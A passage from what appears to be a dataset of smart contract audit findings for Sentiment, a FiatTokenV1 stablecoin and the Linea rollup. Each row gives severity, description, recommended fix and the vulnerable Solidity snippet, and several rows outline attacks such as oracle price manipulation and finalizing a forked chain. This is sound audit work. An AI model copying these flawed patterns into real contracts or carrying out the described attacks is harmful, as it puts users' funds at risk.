block/transaction.\\n```\\nFile: ERC4626.sol\\n function previewRedeem(uint256 shares) public view virtual returns (uint256) {\\n return convertToAssets(shares);\\n }\\n```\\n\\n```\\nFile: ERC4626.sol\\n function convertToAssets(uint256 shares) public view virtual returns (uint256) {\\n uint256 supply = totalSupply; // Saves an extra SLOAD if totalSupply is non-zero.\\n\\n return supply == 0 ? shares : shares.mulDivDown(totalAssets(), supply);\\n }\\n```\\n","Avoid using `previewRedeem` function to calculate the price of the LP token of an ERC4626 vault. Consider implementing TWAP so that the price cannot be inflated or deflated within a single block/transaction or within a short period of time.\\nSentiment Team\\nDepends on the integration itself, so there's no action that can be taken right now.\\nLead Senior Watson\\nAcknowledged.",The attacker could perform price manipulation to make the apparent value of an asset to be much higher or much lower than the true value of the asset. Following are some risks of price manipulation:\\nAn attacker can increase the value of their collaterals to increase their borrowing power so that they can borrow more assets than they are allowed from Sentiment.\\nAn attacker can decrease the value of some collaterals and attempt to liquidate another user account prematurely.,"```\\nFile: ERC4626Oracle.sol\\n function getPrice(address token) external view returns (uint) {\\n uint decimals = IERC4626(token).decimals();\\n return IERC4626(token).previewRedeem(\\n 10 ** decimals\\n ).mulDivDown(\\n oracleFacade.getPrice(IERC4626(token).asset()),\\n 10 ** decimals\\n );\\n }\\n```\\n" +`Reserves` should not be considered part of the available liquidity while calculating the interest rate,medium,"The implementation is different from the documentation regarding the interest rate formula.\\nThe formula given in the docs:\\nCalculates Borrow rate per second:\\n$$ Borrow Rate Per Second = c3 \\cdot (util \\cdot c1 + util^{32} \\cdot c1 + util^{64} \\cdot c2) \\div secsPerYear $$\\nwhere, $util = borrows \\div (liquidity - reserves + borrows)$\\n$$ util=borrows \\div (liquidity−reserves+borrows) $$\\n```\\n function getRateFactor() internal view returns (uint) {\\n return (block.timestamp == lastUpdated) ?\\n 0 :\\n ((block.timestamp - lastUpdated)*1e18)\\n .mulWadUp(\\n rateModel.getBorrowRatePerSecond(\\n asset.balanceOf(address(this)),\\n borrows\\n )\\n );\\n }\\n```\\n\\nHowever, the current implementation is taking all the balance as the liquidity:\\n```\\n function getBorrowRatePerSecond(\\n uint liquidity,\\n uint borrows\\n )\\n external\\n view\\n returns (uint)\\n {\\n uint util = _utilization(liquidity, borrows);\\n return c3.mulDivDown(\\n (\\n util.mulWadDown(c1)\\n + util.rpow(32, SCALE).mulWadDown(c1)\\n + util.rpow(64, SCALE).mulWadDown(c2)\\n ),\\n secsPerYear\\n );\\n }\\n```\\n\\n```\\n function _utilization(uint liquidity, uint borrows)\\n internal\\n pure\\n returns (uint)\\n {\\n uint totalAssets = liquidity + borrows;\\n return (totalAssets == 0) ? 0 : borrows.divWadDown(totalAssets);\\n }\\n```\\n","Issue `Reserves` should not be considered part of the available liquidity while calculating the interest rate\\nThe implementation of `getRateFactor()` can be updated to:\\n```\\nfunction getRateFactor() internal view returns (uint) {\\n return (block.timestamp == lastUpdated) ?\\n 0 :\\n ((block.timestamp - lastUpdated)*1e18)\\n .mulWadUp(\\n rateModel.getBorrowRatePerSecond(\\n asset.balanceOf(address(this)) - reserves,\\n borrows\\n )\\n );\\n}\\n```\\n\\nSentiment Team\\nRemoved reserves from LToken and added an alternate mechanism to collect direct fees.\\nLead Senior Watson\\noriginationFee may result in the borrower account becoming liquidatable immediately (aka WP-M2).\\nSentiment Team\\nFixed as recommended. PR here.\\nLead Senior Watson\\nriskEngine.isBorrowAllowed should be removed as it's no longer needed.\\nSentiment Team\\nPushed a commit to remove the redundant call to riskEngine. PR here.","Per the docs, when calculating the interest rate, `util` is the ratio of available liquidity to the `borrows`, available liquidity should not include reserves.\\nThe current implementation is using all the balance as the `liquidity`, this will make the interest rate lower than expectation.\\nPoC\\nGiven:\\n`asset.address(this) + borrows = 10000`\\n`reserves = 1500, borrows = 7000`\\nExpected result:\\nWhen calculating `getRateFactor()`, available liquidity should be `asset.balanceOf(address(this)) - reserves = 1500, util = 7000 / 8500 = 0.82`, `getBorrowRatePerSecond() = 9114134329`\\nActual result:\\nWhen calculating `getRateFactor()`, `asset.balanceOf(address(this)) = 3000, util = 0.7e18`, `getBorrowRatePerSecond() = 7763863430`\\nThe actual interest rate is only `7763863430 / 9114134329 = 85%` of the expected rate.","```\\n function getRateFactor() internal view returns (uint) {\\n return (block.timestamp == lastUpdated) ?\\n 0 :\\n ((block.timestamp - lastUpdated)*1e18)\\n .mulWadUp(\\n rateModel.getBorrowRatePerSecond(\\n asset.balanceOf(address(this)),\\n borrows\\n )\\n );\\n }\\n```\\n" +LToken's implmentation is not fully up to EIP-4626's specification,medium,"Note: This issue is a part of the extra scope added by Sentiment AFTER the audit contest. This scope was only reviewed by WatchPug and relates to these three PRs:\\nLending deposit cap\\nFee accrual modification\\nCRV staking\\nLToken's implmentation is not fully up to EIP-4626's specification. This issue is would actually be considered a Low issue if it were a part of a Sherlock contest.\\n```\\nfunction maxMint(address) public view virtual returns (uint256) {\\n return type(uint256).max;\\n}\\n```\\n\\nMUST return the maximum amount of shares mint would allow to be deposited to receiver and not cause a revert, which MUST NOT be higher than the actual maximum that would be accepted (it should underestimate if necessary). This assumes that the user has infinite assets, i.e. MUST NOT rely on balanceOf of asset.\\nmaxMint() and maxDeposit() should reflect the limitation of maxSupply.",maxMint() and maxDeposit() should reflect the limitation of maxSupply.\\nConsider changing maxMint() and maxDeposit() to:\\n```\\nfunction maxMint(address) public view virtual returns (uint256) {\\n if (totalSupply >= maxSupply) {\\n return 0;\\n }\\n return maxSupply - totalSupply;\\n}\\n```\\n\\n```\\nfunction maxDeposit(address) public view virtual returns (uint256) {\\n return convertToAssets(maxMint(address(0)));\\n}\\n```\\n\\nSentiment Team\\nFixed as recommended. PR here.\\nLead Senior Watson\\nConfirmed fix.,Could cause unexpected behavior in the future due to non-compliance with EIP-4626 standard.,```\\nfunction maxMint(address) public view virtual returns (uint256) {\\n return type(uint256).max;\\n}\\n```\\n +`UniV2LPOracle` will malfunction if token0 or token1's `decimals != 18`,high,"When one of the LP token's underlying tokens `decimals` is not 18, the price of the LP token calculated by `UniV2LPOracle` will be wrong.\\n`UniV2LPOracle` is an implementation of Alpha Homora v2's Fair Uniswap's LP Token Pricing Formula:\\nThe Formula ... of combining fair asset prices and fair asset reserves:\\n$$ P = 2\\cdot \\frac{\\sqrt{r_0 \\cdot r_1} \\cdot \\sqrt{p_0\\cdot p_1}}{totalSupply}, $$\\nwhere $r_i$ is the asset ii's pool balance and $p_i$ is the asset $i$'s fair price.\\nHowever, the current implementation wrongful assumes $r_0$ and $r_1$ are always in 18 decimals.\\n```\\nfunction getPrice(address pair) external view returns (uint) {\\n (uint r0, uint r1,) = IUniswapV2Pair(pair).getReserves();\\n\\n // 2 * sqrt(r0 * r1 * p0 * p1) / totalSupply\\n return FixedPointMathLib.sqrt(\\n r0\\n .mulWadDown(r1)\\n .mulWadDown(oracle.getPrice(IUniswapV2Pair(pair).token0()))\\n .mulWadDown(oracle.getPrice(IUniswapV2Pair(pair).token1()))\\n )\\n .mulDivDown(2e27, IUniswapV2Pair(pair).totalSupply());\\n}\\n```\\n\\n```\\nuint256 internal constant WAD = 1e18; // The scalar of ETH and most ERC20s.\\n\\nfunction mulWadDown(uint256 x, uint256 y) internal pure returns (uint256) {\\n return mulDivDown(x, y, WAD); // Equivalent to (x * y) / WAD rounded down.\\n}\\n```\\n\\n```\\nfunction mulDivDown(\\n uint256 x,\\n uint256 y,\\n uint256 denominator\\n) internal pure returns (uint256 z) {\\n assembly {\\n // Store x * y in z for now.\\n z := mul(x, y)\\n\\n // Equivalent to require(denominator != 0 && (x == 0 || (x * y) / x == y))\\n if iszero(and(iszero(iszero(denominator)), or(iszero(x), eq(div(z, x), y)))) {\\n revert(0, 0)\\n }\\n\\n // Divide z by the denominator.\\n z := div(z, denominator)\\n }\\n}\\n```\\n",Issue `UniV2LPOracle` will malfunction if token0 or token1's `decimals != 18`\\nConsider normalizing r0 and r1 to 18 decimals before using them in the formula.\\nSentiment Team\\nFixed as recommended. PRs here and here.\\nLead Senior Watson\\nConfirmed fix.,"When the decimals of one or both tokens in the pair is not 18, the price will be way off.","```\\nfunction getPrice(address pair) external view returns (uint) {\\n (uint r0, uint r1,) = IUniswapV2Pair(pair).getReserves();\\n\\n // 2 * sqrt(r0 * r1 * p0 * p1) / totalSupply\\n return FixedPointMathLib.sqrt(\\n r0\\n .mulWadDown(r1)\\n .mulWadDown(oracle.getPrice(IUniswapV2Pair(pair).token0()))\\n .mulWadDown(oracle.getPrice(IUniswapV2Pair(pair).token1()))\\n )\\n .mulDivDown(2e27, IUniswapV2Pair(pair).totalSupply());\\n}\\n```\\n" +Tokens received from Curve's `remove_liquidity()` should be added to the assets list even if `_min_amounts` are set to `0`,high,"Curve controller's `canRemoveLiquidity()` should return all the underlying tokens as `tokensIn` rather than only the tokens with `minAmount > 0`.\\n```\\nfunction canRemoveLiquidity(address target, bytes calldata data)\\n internal\\n view\\n returns (bool, address[] memory, address[] memory)\\n{\\n (,uint256[2] memory amounts) = abi.decode(\\n data[4:],\\n (uint256, uint256[2])\\n );\\n\\n address[] memory tokensOut = new address[](1);\\n tokensOut[0] = target;\\n\\n uint i; uint j;\\n address[] memory tokensIn = new address[](2);\\n while(i < 2) {\\n if(amounts[i] > 0)\\n tokensIn[j++] = IStableSwapPool(target).coins(i);\\n unchecked { ++i; }\\n }\\n assembly { mstore(tokensIn, j) }\\n\\n return (true, tokensIn, tokensOut);\\n}\\n```\\n\\nThe `amounts` in Curve controller's `canRemoveLiquidity()` represent the ""Minimum `amounts` of underlying coins to receive"", which is used for slippage control.\\nAt L144-149, only the tokens that specified a minAmount > 0 will be added to the `tokensIn` list, which will later be added to the account's assets list.\\nWe believe this is wrong as regardless of the minAmount `remove_liquidity()` will always receive all the underlying tokens.\\nTherefore, it should not check and only add the token when it's minAmount > 0.","`canRemoveLiquidity()` can be changed to:\\n```\\nfunction canRemoveLiquidity(address target, bytes calldata data)\\n internal\\n view\\n returns (bool, address[] memory, address[] memory)\\n{\\n address[] memory tokensOut = new address[](1);\\n tokensOut[0] = target;\\n\\n address[] memory tokensIn = new address[](2);\\n tokensIn[0] = IStableSwapPool(target).coins(0);\\n tokensIn[1] = IStableSwapPool(target).coins(1);\\n return (true, tokensIn, tokensOut);\\n}\\n```\\n\\nSentiment Team\\nFixed as recommended. PR here.\\nLead Senior Watson\\nConfirmed fix.","When the user set `_min_amounts` = `0` while removing liquidity from `Curve` and the withdrawn tokens are not in the account's assets list already, the user may get liquidated sooner than expected as `RiskEngine.sol#_getBalance()` only counts in the assets in the assets list.","```\\nfunction canRemoveLiquidity(address target, bytes calldata data)\\n internal\\n view\\n returns (bool, address[] memory, address[] memory)\\n{\\n (,uint256[2] memory amounts) = abi.decode(\\n data[4:],\\n (uint256, uint256[2])\\n );\\n\\n address[] memory tokensOut = new address[](1);\\n tokensOut[0] = target;\\n\\n uint i; uint j;\\n address[] memory tokensIn = new address[](2);\\n while(i < 2) {\\n if(amounts[i] > 0)\\n tokensIn[j++] = IStableSwapPool(target).coins(i);\\n unchecked { ++i; }\\n }\\n assembly { mstore(tokensIn, j) }\\n\\n return (true, tokensIn, tokensOut);\\n}\\n```\\n" +Accounts with ETH loans can not be liquidated if LEther's underlying is set to `address(0)`,medium,"Setting `address(0)` as LEther's `underlying` is allowed, and the logic in `AccountManager#settle()` and `RiskEngine#_valueInWei()` handles `address(0)` specially, which implies that `address(0)` can be an asset.\\nHowever, if LEther's underlying is set to `address(0)`, the accounts with ETH loans will become unable to be liquidated.\\nGiven that at `AccountManager.sol#L100` in `settle()` and `RiskEngine.sol#L186` in `_valueInWei()`, they both handled the case that the `asset == address(0)`, and in `Registry.sol#setLToken()`, `underlying == address(0)` is allowed:\\nWe assume that `address(0)` can be set as the `underlying` of `LEther`.\\nIn that case, when the user borrows native tokens, `address(0)` will be added to the user's assets and borrows list.\\n```\\nfunction borrow(address account, address token, uint amt)\\n external\\n whenNotPaused\\n onlyOwner(account)\\n{\\n if (registry.LTokenFor(token) == address(0))\\n revert Errors.LTokenUnavailable();\\n if (!riskEngine.isBorrowAllowed(account, token, amt))\\n revert Errors.RiskThresholdBreached();\\n if (IAccount(account).hasAsset(token) == false)\\n IAccount(account).addAsset(token);\\n if (ILToken(registry.LTokenFor(token)).lendTo(account, amt))\\n IAccount(account).addBorrow(token);\\n emit Borrow(account, msg.sender, token, amt);\\n}\\n```\\n\\nThis will later prevent the user from being liquidated because in `riskEngine.isAccountHealthy()`, it calls `_getBalance()` in the for loop of all the assets, which assumes all the assets complies with `IERC20`. Thus, the transaction will revert at L157 when calling `IERC20(address(0)).balanceOf(account)`.\\n```\\nfunction liquidate(address account) external {\\n if (riskEngine.isAccountHealthy(account))\\n revert Errors.AccountNotLiquidatable();\\n _liquidate(account);\\n emit AccountLiquidated(account, registry.ownerFor(account));\\n}\\n```\\n\\n```\\nfunction _getBalance(address account) internal view returns (uint) {\\n address[] memory assets = IAccount(account).getAssets();\\n uint assetsLen = assets.length;\\n uint totalBalance;\\n for(uint i; i < assetsLen; ++i) {\\n totalBalance += _valueInWei(\\n assets[i],\\n IERC20(assets[i]).balanceOf(account)\\n );\\n }\\n return totalBalance + account.balance;\\n}\\n```\\n",Issue Accounts with ETH loans can not be liquidated if LEther's underlying is set to `address(0)`\\nConsider removing the misleading logic in `AccountManager#settle()` and `RiskEngine#_valueInWei()` that handles `address(0)` as an asset;\\nConsider disallowing adding `address(0)` as `underlying` in `setLToken()`.\\nSentiment Team\\nFixed as recommended. PR here.\\nLead Senior Watson\\nConfirmed fix.,"We noticed that in the deployment documentation, LEther is set to init with WETH as the `underlying`. Therefore, this should not be an issue if the system is being deployed correctly.\\n```\\n1. ETH\\n 1. Deploy LEther implementation\\n 2. Deploy Proxy(LEther)\\n 3. call init(WETH), ""LEther"", ""LEth"", IRegistry, reserveFactor)\\n 4. call Registry.setLToken(WETH, Proxy)\\n 5. call accountManager.toggleCollateralStatus(token)\\n 6. call Proxy.initDep()\\n```\\n\\nBut considering that setting `address(0)` as LEther's `underlying` is still plausible and the potential damage to the whole protocol is high (all the accounts with ETH loans can not be liquidated), we believe that this should be a medium severity issue.","```\\nfunction borrow(address account, address token, uint amt)\\n external\\n whenNotPaused\\n onlyOwner(account)\\n{\\n if (registry.LTokenFor(token) == address(0))\\n revert Errors.LTokenUnavailable();\\n if (!riskEngine.isBorrowAllowed(account, token, amt))\\n revert Errors.RiskThresholdBreached();\\n if (IAccount(account).hasAsset(token) == false)\\n IAccount(account).addAsset(token);\\n if (ILToken(registry.LTokenFor(token)).lendTo(account, amt))\\n IAccount(account).addBorrow(token);\\n emit Borrow(account, msg.sender, token, amt);\\n}\\n```\\n" +Missing revert keyword,medium,"Missing `revert` keyword in `functionDelegateCall` bypasses an intended safety check, allowing the function to fail silently.\\nIn the helper function `functionDelegateCall`, there is a check to confirm that the target being called is a contract.\\n```\\nif (!isContract(target)) Errors.AddressNotContract;\\n```\\n\\nHowever, there is a typo in the check that is missing the `revert` keyword.\\nAs a result, non-contracts can be submitted as targets, which will cause the delegatecall below to return success (because EVM treats no code as STOP opcode), even though it doesn't do anything.\\n```\\n(bool success, ) = target.delegatecall(data);\\nrequire(success, ""CALL_FAILED"");\\n```\\n",Issue Missing revert keyword\\nAdd missing `revert` keyword to L70 of Helpers.sol.\\n```\\nif (!isContract(target)) revert Errors.AddressNotContract;\\n```\\n\\nSentiment Team\\nFixed as recommended. PR here.\\nLead Senior Watson\\nConfirmed fix.,"The code doesn't accomplish its intended goal of checking to confirm that only contracts are passed as targets, so delegatecalls can silently fail.",```\\nif (!isContract(target)) Errors.AddressNotContract;\\n```\\n +No Limit for Minting Amount,high,"In token contract `FiatTokenV1`, there is no limit set for amount of tokens can be minted, as a result, the minter can mint unlimited tokens, disrupting the token supply and value.\\n```\\nfunction mint(address to, uint256 amount) public onlyRole(MINTER\\_ROLE) {\\n \\_mint(to, amount);\\n}\\n```\\n",Add a limit for the number of tokens the minter can mint.,,"```\\nfunction mint(address to, uint256 amount) public onlyRole(MINTER\\_ROLE) {\\n \\_mint(to, amount);\\n}\\n```\\n" +Private Key Is Exposed in the Deployment and Upgrade Script,high,"In the contract deploying and upgrading script, private key is used to broadcast the transaction, this would expose private key of the deployer and upgrader account on the machine running the script, therefore compromising these accounts.\\n```\\nuint256 deployerPrivateKey = vm.envUint(""PRIVATE\\_KEY"");\\n```\\n\\n```\\nuint256 deployerPrivateKey = vm.envUint(""PRIVATE\\_KEY"");\\nvm.startBroadcast(deployerPrivateKey);\\n```\\n","Have Forge sending a raw transaction to the cold wallet of the account, the wallet signs the transaction then return the signed transactions to Forge and broadcaster. Alternatively use different wallet for deployment and upgrade and stop using the wallet after the script is complete",,"```\\nuint256 deployerPrivateKey = vm.envUint(""PRIVATE\\_KEY"");\\n```\\n" +Critical Functions Are Public and Without Access Control,medium,"Critical functions in RescuableV1(rescue) and `BlacklistableV1` `(blacklist,unblacklist)` are public and unauthenticated, any one can call these function to steal funds and blacklist other accounts. Although the child contract `FiatTokenV1` has authenticated the overridden functions and protected them from public access, other contracts inheriting `RescuableV1` and `BlacklistableV1` might have risks from the unauthenticated public functions\\n```\\nfunction rescue(IERC20 token, address to, uint256 amount) public virtual {\\n```\\n\\n```\\nfunction blacklist(address account) public virtual {\\n \\_blacklisted[account] = true;\\n emit Blacklisted(account);\\n}\\n\\n/\\*\\*\\n \\* @dev Removes account from blacklist\\n \\* @param account The address to remove from the blacklist\\n \\*/\\nfunction unBlacklist(address account) public virtual {\\n \\_blacklisted[account] = false;\\n emit UnBlacklisted(account);\\n}\\n```\\n",Make these functions internal and in the child contract add correspondent public function with authentication to call the inherited functions,,"```\\nfunction rescue(IERC20 token, address to, uint256 amount) public virtual {\\n```\\n" +Unecessary Parent Contracts,low,"Contract `BlacklistableV1` and `RescuableV1` extends `ContextUpgradeable` and `ERC20Upgradeable,` which are not used in any of contract functions and are already inherited by the child contract `FiatTokenV1`.\\n```\\nabstract contract BlacklistableV1 is Initializable, ContextUpgradeable, ERC20Upgradeable {\\n```\\n\\n```\\nabstract contract RescuableV1 is Initializable, ContextUpgradeable, ERC20Upgradeable {\\n```\\n\\n```\\ncontract FiatTokenV1 is\\n Initializable,\\n ERC20Upgradeable,\\n ERC20PausableUpgradeable,\\n ERC20BurnableUpgradeable,\\n AccessControlUpgradeable,\\n ERC20PermitUpgradeable,\\n UUPSUpgradeable,\\n BlacklistableV1,\\n RescuableV1\\n{\\n```\\n",Remove the unnecessary parent contracts,,"```\\nabstract contract BlacklistableV1 is Initializable, ContextUpgradeable, ERC20Upgradeable {\\n```\\n" +Redundant _disableInitializers in Constructor,low,"Contract `FiatTokenV1` inherits from contracts `BlacklistableV1` and `RescuableV1`, the two parent contracts both have `_disableInitializers` in their constructors to prevent uninitialized contract being initialized by the attackers, it's not necessary to have `_disableInitializers` in the FiatTokenV1's constructor, which is redundant and inefficient.\\n```\\nconstructor() {\\n \\_disableInitializers();\\n}\\n```\\n",Remove constructor from `FiatTokenV1`,,```\\nconstructor() {\\n \\_disableInitializers();\\n}\\n```\\n +Incorrect Final Block Number Can Be Finalized,high,"In the data finalization function `finalizeCompressedBlocksWithProof`, `finalizationData.finalBlockNumber` is the final block number of the compressed block data to be finalized. However, there is no check in the contract or the prover to ensure `finalBlockNumber` is correct when there is no new data submitted in the finalization, i.e., `submissionDataLength == 0` . The prover can submit an incorrect final block number and, as a result, the finalized block number (currentL2BlockNumber) would be incorrect. Consequently, the prover can skip block data in the finalization.\\n```\\ncurrentL2BlockNumber = \\_finalizationData.finalBlockNumber;\\n```\\n\\n```\\nif (stateRootHashes[currentL2BlockNumber] != \\_finalizationData.parentStateRootHash) {\\n revert StartingRootHashDoesNotMatch();\\n}\\n```\\n","Resolution\\nfixed by adding a recommended check of `finalBlockNumber` matching the last block number of the submitted data in `_finalizeCompressedBlocks` and a check in the prover and adding `finalBlockNumber` and `lastFinalizedBlockNumber` in the public input of the verifier in the finalization in PR-24\\nIn `_finalizeCompressedBlocks`, check if `finalBlockNumber` is equal to the last block number (finalBlockInData) of the last item of submitted block data. Another solution is to have the prover show that finalBlockNumberis correct in the proof by providing the last finalized block number (lastFinalizedBlockNumber) and verify it by adding `finalBlockNumber` and `lastFinalizedBlockNumber` in the public input of the verifier in the finalization.",,```\\ncurrentL2BlockNumber = \\_finalizationData.finalBlockNumber;\\n```\\n +Finalization Fails for the First Batch of Data Submitted After Migration to the Updated Contract,high,"When submitting the initial batch of compressed block data after the contract update, the finalization will fail.\\nIn function `_finalizeCompressedBlocks`, `startingDataParentHash = dataParents[_finalizationData.dataHashes[0]]` will be empty and, therefore, `startingParentFinalStateRootHash = dataFinalStateRootHashes[startingDataParentHash]` will be empty too. The check `_finalizationData.parentStateRootHash == stateRootHashes[currentL2BlockNumber]` requires `_finalizationData.parentStateRootHash == _initialStateRootHash`, which is not empty, so the condition `startingParentFinalStateRootHash != _finalizationData.parentStateRootHash` is true, and we revert with the error FinalStateRootHashDoesNotMatch:\\n```\\nif (stateRootHashes[currentL2BlockNumber] != \\_finalizationData.parentStateRootHash) {\\n revert StartingRootHashDoesNotMatch();\\n}\\n```\\n\\n```\\nif (finalizationDataDataHashesLength != 0) {\\n bytes32 startingDataParentHash = dataParents[\\_finalizationData.dataHashes[0]];\\n\\n if (startingDataParentHash != \\_finalizationData.dataParentHash) {\\n revert ParentHashesDoesNotMatch(startingDataParentHash, \\_finalizationData.dataParentHash);\\n }\\n\\n bytes32 startingParentFinalStateRootHash = dataFinalStateRootHashes[startingDataParentHash];\\n\\n if (startingParentFinalStateRootHash != \\_finalizationData.parentStateRootHash) {\\n revert FinalStateRootHashDoesNotMatch(startingParentFinalStateRootHash, \\_finalizationData.parentStateRootHash);\\n }\\n```\\n",Set the correct initial value for `dataFinalStateRootHashes` for the initial batch of compressed block data.,,```\\nif (stateRootHashes[currentL2BlockNumber] != \\_finalizationData.parentStateRootHash) {\\n revert StartingRootHashDoesNotMatch();\\n}\\n```\\n +Prover Can Censor L2 → L1 Messages Partially Addressed,high,"In L2 → L1 messaging, messages are grouped and added to a Merkle tree by the prover. During finalization, the operator (coordinator) submits the Merkle root to L1, and the user SDK rebuilds the tree to which the message is added and generates a Merkle proof to claim against the root finalized on L1. However, the prover can skip messages when building the tree. Consequently, the user cannot claim the skipped message, which might result in frozen funds.\\nCurrently, the prover is a single entity owned by Linea. Hence, this would require malice or negligence on Linea's part.\\n```\\n\\_addL2MerkleRoots(\\_finalizationData.l2MerkleRoots, \\_finalizationData.l2MerkleTreesDepth);\\n\\_anchorL2MessagingBlocks(\\_finalizationData.l2MessagingBlocksOffsets, lastFinalizedBlock);\\n```\\n","Decentralize the prover, so messages can be included by different provers.",,"```\\n\\_addL2MerkleRoots(\\_finalizationData.l2MerkleRoots, \\_finalizationData.l2MerkleTreesDepth);\\n\\_anchorL2MessagingBlocks(\\_finalizationData.l2MessagingBlocksOffsets, lastFinalizedBlock);\\n```\\n" +Malicious Operator Might Finalize Data From a Forked Linea Chain,high,"A malicious operator (prover) can add and finalize block data from a forked Linea chain, so transactions on the forked chain can be finalized, causing a loss of funds from the L1.\\nFor example, a malicious operator forks the canonical chain, then the attacker sends the forked chain Ether to L1 with `sendMessage` from the forked L2. The operator then submits the block data to L1 and finalizes it with `finalizeCompressedBlocksWithProof`, using the finalization data and proof from the forked chain. (Note that the malicious prover sets the forked chain `chainId` in its circuit as a constant.) The L1 contract (LineaRollup) doesn't know whether the data and the proof are from the canonical L2 or the forked one. The finalization succeeds, and the attacker can claim the bridged forked chain Ether and steal funds from L1.\\nAs there is currently only one operator and it is owned by the Linea team, this kind of attack is unlikely to happen. However, when the operator and the coordinator are decentralized, the likelihood of this attack increases.\\n```\\nuint256 publicInput = uint256(\\n keccak256(\\n abi.encode(\\n shnarf,\\n \\_finalizationData.parentStateRootHash,\\n \\_finalizationData.lastFinalizedTimestamp,\\n \\_finalizationData.finalBlockNumber,\\n \\_finalizationData.finalTimestamp,\\n \\_finalizationData.l1RollingHash,\\n \\_finalizationData.l1RollingHashMessageNumber,\\n keccak256(abi.encodePacked(\\_finalizationData.l2MerkleRoots))\\n )\\n```\\n\\n```\\n\\_addL2MerkleRoots(\\_finalizationData.l2MerkleRoots, \\_finalizationData.l2MerkleTreesDepth);\\n```\\n","Add `chainId` in the `FinalizationData` as a public input of the verifier function `_verifyProof`, so the proof from the forked Linea chain will not pass the verification because the `chainId` won't match.",,"```\\nuint256 publicInput = uint256(\\n keccak256(\\n abi.encode(\\n shnarf,\\n \\_finalizationData.parentStateRootHash,\\n \\_finalizationData.lastFinalizedTimestamp,\\n \\_finalizationData.finalBlockNumber,\\n \\_finalizationData.finalTimestamp,\\n \\_finalizationData.l1RollingHash,\\n \\_finalizationData.l1RollingHashMessageNumber,\\n keccak256(abi.encodePacked(\\_finalizationData.l2MerkleRoots))\\n )\\n```\\n" +The Compressed Block Data Is Not Verified Against Data in the Prover During Data Submission Acknowledged,medium,"When the sequencer submits the batched block data with the `submitData` function, it's expected to check that the submitted commitment of the compressed block data `keccak(_submissionData.compressedData)` and the commitment of the block data used in the prover (snarkHash) commit to the same data. This is done by proof of equivalence; the `x` is calculated by hashing `keccak(_submissionData.compressedData)` and `snarkHash`, and `y` is provided by the prover. Then it's verified that `P(x) = y`, where `P` is a polynomial that encodes the compressed data (_submissionData.compressedData). However, in the `submitData` function, `y` is evaluated by `_calculateY` but it is not checked against the `y` provided by the prover. In fact, the prover doesn't provide `y` to the function; instead `x` and `y` are provided to the prover who would evaluate `y'` and compare it with `y` from the contract, then `x` and `y` are included in the public input for the proof verification in the finalization.\\n```\\nshnarf = keccak256(\\n abi.encode(\\n shnarf,\\n _submissionData.snarkHash,\\n _submissionData.finalStateRootHash,\\n compressedDataComputedX,\\n _calculateY(_submissionData.compressedData, compressedDataComputedX)\\n )\\n ); \\n```\\n\\nThe only difference is if the two commitments don't commit to the same block data (meaning the data submitted doesn't match the data used in the prover), `submitData` would fail - while in the current implementation, it would fail in the proof verification during the finalization. As a result, if the data submitted doesn't match the data in the prover in the finalization, the operator has to submit the correct data again in order to finalize it. Linea stated they will verify it in the data submission, once EIP-4844 is implemented.\\n```\\nfunction \\_submitData(SubmissionData calldata \\_submissionData) internal returns (bytes32 shnarf) {\\n shnarf = dataShnarfHashes[\\_submissionData.dataParentHash];\\n\\n bytes32 parentFinalStateRootHash = dataFinalStateRootHashes[\\_submissionData.dataParentHash];\\n uint256 lastFinalizedBlock = currentL2BlockNumber;\\n\\n if (\\_submissionData.firstBlockInData <= lastFinalizedBlock) {\\n revert FirstBlockLessThanOrEqualToLastFinalizedBlock(\\_submissionData.firstBlockInData, lastFinalizedBlock);\\n }\\n\\n if (\\_submissionData.firstBlockInData > \\_submissionData.finalBlockInData) {\\n revert FirstBlockGreaterThanFinalBlock(\\_submissionData.firstBlockInData, \\_submissionData.finalBlockInData);\\n }\\n\\n if (\\_submissionData.parentStateRootHash != parentFinalStateRootHash) {\\n revert StateRootHashInvalid(parentFinalStateRootHash, \\_submissionData.parentStateRootHash);\\n }\\n\\n bytes32 currentDataHash = keccak256(\\_submissionData.compressedData);\\n\\n if (dataFinalStateRootHashes[currentDataHash] != EMPTY\\_HASH) {\\n revert DataAlreadySubmitted(currentDataHash);\\n }\\n\\n dataParents[currentDataHash] = \\_submissionData.dataParentHash;\\n dataFinalStateRootHashes[currentDataHash] = \\_submissionData.finalStateRootHash;\\n\\n bytes32 compressedDataComputedX = keccak256(abi.encode(\\_submissionData.snarkHash, currentDataHash));\\n\\n shnarf = keccak256(\\n abi.encode(\\n shnarf,\\n \\_submissionData.snarkHash,\\n \\_submissionData.finalStateRootHash,\\n compressedDataComputedX,\\n \\_calculateY(\\_submissionData.compressedData, compressedDataComputedX)\\n )\\n );\\n\\n dataShnarfHashes[currentDataHash] = shnarf;\\n\\n emit DataSubmitted(currentDataHash, \\_submissionData.firstBlockInData, \\_submissionData.finalBlockInData);\\n}\\n```\\n\\n```\\nfunction \\_calculateY(\\n bytes calldata \\_data,\\n bytes32 \\_compressedDataComputedX\\n) internal pure returns (bytes32 compressedDataComputedY) {\\n if (\\_data.length % 0x20 != 0) {\\n revert BytesLengthNotMultipleOf32();\\n }\\n\\n bytes4 errorSelector = ILineaRollup.FirstByteIsNotZero.selector;\\n assembly {\\n for {\\n let i := \\_data.length\\n } gt(i, 0) {\\n\\n } {\\n i := sub(i, 0x20)\\n let chunk := calldataload(add(\\_data.offset, i))\\n if iszero(iszero(and(chunk, 0xFF00000000000000000000000000000000000000000000000000000000000000))) {\\n let ptr := mload(0x40)\\n mstore(ptr, errorSelector)\\n revert(ptr, 0x4)\\n }\\n compressedDataComputedY := addmod(\\n mulmod(compressedDataComputedY, \\_compressedDataComputedX, Y\\_MODULUS),\\n chunk,\\n Y\\_MODULUS\\n )\\n }\\n }\\n}\\n```\\n",Add the compressed block data verification in the `submitData` function.,,"```\\nshnarf = keccak256(\\n abi.encode(\\n shnarf,\\n _submissionData.snarkHash,\\n _submissionData.finalStateRootHash,\\n compressedDataComputedX,\\n _calculateY(_submissionData.compressedData, compressedDataComputedX)\\n )\\n ); \\n```\\n" +Empty Compressed Data Allowed in Data Submission,medium,"In `submitData`, the coordinator can submit data with empty `compressedData` in `_submissionData`, which is not a desired purpose of this function and may cause undefined system behavior.\\n```\\nfunction submitData(\\n SubmissionData calldata \\_submissionData\\n)\\n external\\n whenTypeNotPaused(PROVING\\_SYSTEM\\_PAUSE\\_TYPE)\\n whenTypeNotPaused(GENERAL\\_PAUSE\\_TYPE)\\n onlyRole(OPERATOR\\_ROLE)\\n{\\n \\_submitData(\\_submissionData);\\n}\\n```\\n",Add a check to disallow data submission with empty `compressedData`.,,```\\nfunction 